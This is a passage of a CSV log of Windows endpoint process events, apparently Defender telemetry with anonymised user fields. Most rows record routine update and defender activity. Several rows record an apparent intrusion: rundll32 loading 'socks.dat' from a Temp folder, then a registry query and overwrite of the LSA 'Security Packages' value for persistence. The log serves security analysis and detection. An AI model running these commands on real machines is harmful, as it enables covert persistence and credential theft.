Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,984,128,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,644888,2103-08-02 08:43:42+00:00,2021-06-14 00:56:50.051000+00:00,2021-06-23 00:55:21.627906600+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1388,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:41:06.739070+00:00,20196,wuauclt.exe,"""wuauclt.exe"" /UpdateDeploymentProvider UpdateDeploymentProvider.dll /ClassId 126e2104-3bd5-4634-aecf-f9d83e56aab8 /RunHandlerComServer",PortableExecutable,2021-04-14 01:10:16.553201900+00:00,C:\Windows\System32\wuauclt.exe,64008,970600bd493cac68a5b1efe9dbb626f9,2423ce1293c1980ee7dd4543efeb48b69634dbce875c830e7f8cd87f3c6d25b4,3f5c88006e75e1fbbd8de658d1d66aeac432de75,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 04:40:47.993547800+00:00,10868,svchost.exe,svchost.exe -k netsvcs -p -s wuauserv,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:41:06.792200300+00:00,2021-06-23 04:41:30.659363500+00:00,7f37c7ca-0c45-4de9-a41d-be5b5c821d09,computerpii_0a470890c60768167990033d701e7bd881398861,162837,False,10.7740.19041.1052,False,11540474045173505,,11540474045173511,2021-06-23 04:40:47.993547800+00:00,10868,2021-06-23 04:40:47.993547800+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,10868,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-18 00:35:29.821925200+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,wuauclt.exe,wuauclt.exe,Windows Update
+1389,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:41:06.988556800+00:00,5844,AM_Delta_Patch_1.341.1257.0.exe,"""AM_Delta_Patch_1.341.1257.0.exe"" WD /q",PortableExecutable,2021-06-23 04:41:06.782752800+00:00,C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.341.1257.0.exe,414144,300593048d599cd947b782ea93689c58,6c6ee2fefa8ed9cba8dcf16c5b22c3fcc62362328912c35be47e1c8af3e4b84f,9ac2f12db75ee9fe293478a23b79d987e3d89cf9,970600bd493cac68a5b1efe9dbb626f9,2423ce1293c1980ee7dd4543efeb48b69634dbce875c830e7f8cd87f3c6d25b4,3f5c88006e75e1fbbd8de658d1d66aeac432de75,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 04:41:06.739070+00:00,20196,wuauclt.exe,"""wuauclt.exe"" /UpdateDeploymentProvider UpdateDeploymentProvider.dll /ClassId 126e2104-3bd5-4634-aecf-f9d83e56aab8 /RunHandlerComServer",True,2021-06-23 04:40:47.993547800+00:00,10868,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:41:07.591692900+00:00,2021-06-23 04:41:30.659548500+00:00,ae611f08-01db-40e6-82cd-da82e5091864,computerpii_0a470890c60768167990033d701e7bd881398861,162840,False,10.7740.19041.1052,False,11540474045173511,,11540474045173512,2021-06-23 04:41:06.739070+00:00,20196,2021-06-23 04:41:06.739070+00:00,wuauclt.exe,20196,256,ActiveProcessStartkey,C:\Windows\System32,64008,1970-11-28 05:49:59+00:00,2021-04-14 01:10:16.555182500+00:00,2021-06-23 04:41:06.742350+00:00,2021-04-14 01:10:16.553201900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,wuauclt.exe,wuauclt.exe,Windows Update,Microsoft Corporation,Microsoft Malware Protection,1.341.1260.0,AM_Delta_Patch_1.341.1257.0.exe,AM_Delta_Patch_1.341.1257.0.exe,Microsoft Antimalware WU Stub
+1390,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:41:07.031668900+00:00,17700,MpSigStub.exe,MpSigStub.exe /stub 1.1.17800.4 /payload 1.341.1260.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.341.1257.0.exe WD /q,PortableExecutable,2020-11-11 01:11:41.879252300+00:00,C:\Windows\System32\MpSigStub.exe,799104,5221b7a59665153028fb57761ce560b9,0bc408c801441239f72d7df3dd6edbcdfb5313d6ae5a04c0a13e8c2dfc39f6d8,d65eae951fe09f39555951970ad03737520c7b12,300593048d599cd947b782ea93689c58,6c6ee2fefa8ed9cba8dcf16c5b22c3fcc62362328912c35be47e1c8af3e4b84f,9ac2f12db75ee9fe293478a23b79d987e3d89cf9,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 04:41:06.988556800+00:00,5844,AM_Delta_Patch_1.341.1257.0.exe,"""AM_Delta_Patch_1.341.1257.0.exe"" WD /q",True,2021-06-23 04:41:06.739070+00:00,20196,wuauclt.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:41:07.594477700+00:00,2021-06-23 04:41:30.659612100+00:00,27417b2f-0582-43df-88da-afe339d2501e,computerpii_0a470890c60768167990033d701e7bd881398861,162841,False,10.7740.19041.1052,False,11540474045173512,,11540474045173513,2021-06-23 04:41:06.988556800+00:00,5844,2021-06-23 04:41:06.988556800+00:00,\Device\HarddiskVolume3\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.341.1257.0.exe,5844,128,ActiveProcessStartkey,C:\Windows\SoftwareDistribution\Download\Install,414144,2021-06-22 21:02:30+00:00,2021-06-23 04:41:06.037645+00:00,2021-06-23 04:41:07.026395500+00:00,2021-06-23 04:41:06.782752800+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Malware Protection,1.341.1260.0,AM_Delta_Patch_1.341.1257.0.exe,AM_Delta_Patch_1.341.1257.0.exe,Microsoft Antimalware WU Stub,Microsoft Corporation,Microsoft Malware Protection,1.1.17800.4,MpSigStub.exe,MpSigStub.exe,Microsoft Malware Protection Signature Update Stub
+1391,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:20:11.404629600+00:00,7188,cmd.exe,"""cmd.exe"" /c ""reg query ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"" /v ""Security Packages""""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:16:43.971462700+00:00,16760,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",True,2021-06-23 03:16:43.772747700+00:00,6872,\Device\HarddiskVolume3\Windows\System32\dllhost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:20:11.945878500+00:00,2021-06-23 03:20:56.264818200+00:00,878b9650-93a5-465f-ab6e-2db0f9b292f5,computerpii_0a470890c60768167990033d701e7bd881398861,161347,False,10.7740.19041.1052,False,11540474045173046,,11540474045173070,2021-06-23 03:16:43.971462700+00:00,16760,2021-06-23 03:16:43.971462700+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,16760,18560,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-23 03:14:30.370328400+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,5.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1392,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:20:11.436720900+00:00,17472,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:20:11.404629600+00:00,7188,cmd.exe,"""cmd.exe"" /c ""reg query ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"" /v ""Security Packages""""",True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:20:11.946125+00:00,2021-06-23 03:20:56.264889100+00:00,88b62c9e-f5f5-441b-a436-ccc30a9b71db,computerpii_0a470890c60768167990033d701e7bd881398861,161348,False,10.7740.19041.1052,False,11540474045173070,,11540474045173071,2021-06-23 03:20:11.404629600+00:00,7188,2021-06-23 03:20:11.404629600+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,7188,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1393,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:20:11.481572100+00:00,12804,reg.exe,"reg  query ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"" /v ""Security Packages""",PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\reg.exe,77312,227f63e1d9008b36bdbcc4b397780be4,c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d,c0db341defa8ef40c03ed769a9001d600e0f4dae,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:20:11.404629600+00:00,7188,cmd.exe,"""cmd.exe"" /c ""reg query ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"" /v ""Security Packages""""",True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:20:11.948795800+00:00,2021-06-23 03:20:56.264938+00:00,0175f29c-e9a5-4d2e-9e4b-294531de25e2,computerpii_0a470890c60768167990033d701e7bd881398861,161349,False,10.7740.19041.1052,False,11540474045173070,,11540474045173072,2021-06-23 03:20:11.404629600+00:00,7188,2021-06-23 03:20:11.404629600+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,7188,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,reg.exe,reg.exe,Registry Console Tool
+1394,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:20:19.739349800+00:00,10556,cmd.exe,"""cmd.exe"" /c ""reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"" /v ""Security Packages"" /t REG_MULTI_SZ /d ""wmic"" /f""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:16:43.971462700+00:00,16760,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",True,2021-06-23 03:16:43.772747700+00:00,6872,\Device\HarddiskVolume3\Windows\System32\dllhost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:20:19.801428200+00:00,2021-06-23 03:20:56.265081900+00:00,6fc71349-5bd8-4aa1-a296-7208391aeece,computerpii_0a470890c60768167990033d701e7bd881398861,161352,False,10.7740.19041.1052,False,11540474045173046,,11540474045173073,2021-06-23 03:16:43.971462700+00:00,16760,2021-06-23 03:16:43.971462700+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,16760,18560,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-23 03:14:30.370328400+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,5.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1395,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:20:19.747016400+00:00,14604,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:20:19.739349800+00:00,10556,cmd.exe,"""cmd.exe"" /c ""reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"" /v ""Security Packages"" /t REG_MULTI_SZ /d ""wmic"" /f""",True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:20:19.801698300+00:00,2021-06-23 03:20:56.265134300+00:00,53ffa867-8bce-48ff-b533-1a130cc3aae5,computerpii_0a470890c60768167990033d701e7bd881398861,161353,False,10.7740.19041.1052,False,11540474045173073,,11540474045173074,2021-06-23 03:20:19.739349800+00:00,10556,2021-06-23 03:20:19.739349800+00:00,cmd.exe,10556,18688,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1396,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:20:19.786470900+00:00,13868,reg.exe,"reg  add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"" /v ""Security Packages"" /t REG_MULTI_SZ /d ""wmic"" /f",PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\reg.exe,77312,227f63e1d9008b36bdbcc4b397780be4,c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d,c0db341defa8ef40c03ed769a9001d600e0f4dae,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:20:19.739349800+00:00,10556,cmd.exe,"""cmd.exe"" /c ""reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"" /v ""Security Packages"" /t REG_MULTI_SZ /d ""wmic"" /f""",True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:20:19.802537+00:00,2021-06-23 03:20:56.265187500+00:00,7bd6dd86-29f7-4518-9614-50a245471f0a,computerpii_0a470890c60768167990033d701e7bd881398861,161354,False,10.7740.19041.1052,False,11540474045173073,,11540474045173075,2021-06-23 03:20:19.739349800+00:00,10556,2021-06-23 03:20:19.739349800+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,10556,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,reg.exe,reg.exe,Registry Console Tool
+1397,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 03:02:13.749041400+00:00,11068,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""2624"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:02:14.400935200+00:00,2021-06-24 03:04:26.961293800+00:00,e5e816b7-1c8e-41b2-895b-7c4981aa03b0,computerpii_0a470890c60768167990033d701e7bd881398861,173878,False,10.7740.19041.1052,False,11540474045137006,,11540474045176141,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+1398,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 03:02:23.879854+00:00,19732,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'bd8fdffb51c0651adc1ce2a6332eed22b69b77119c214ae0048e24e1342c27a0')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1' }""",PortableExecutable,2020-10-09 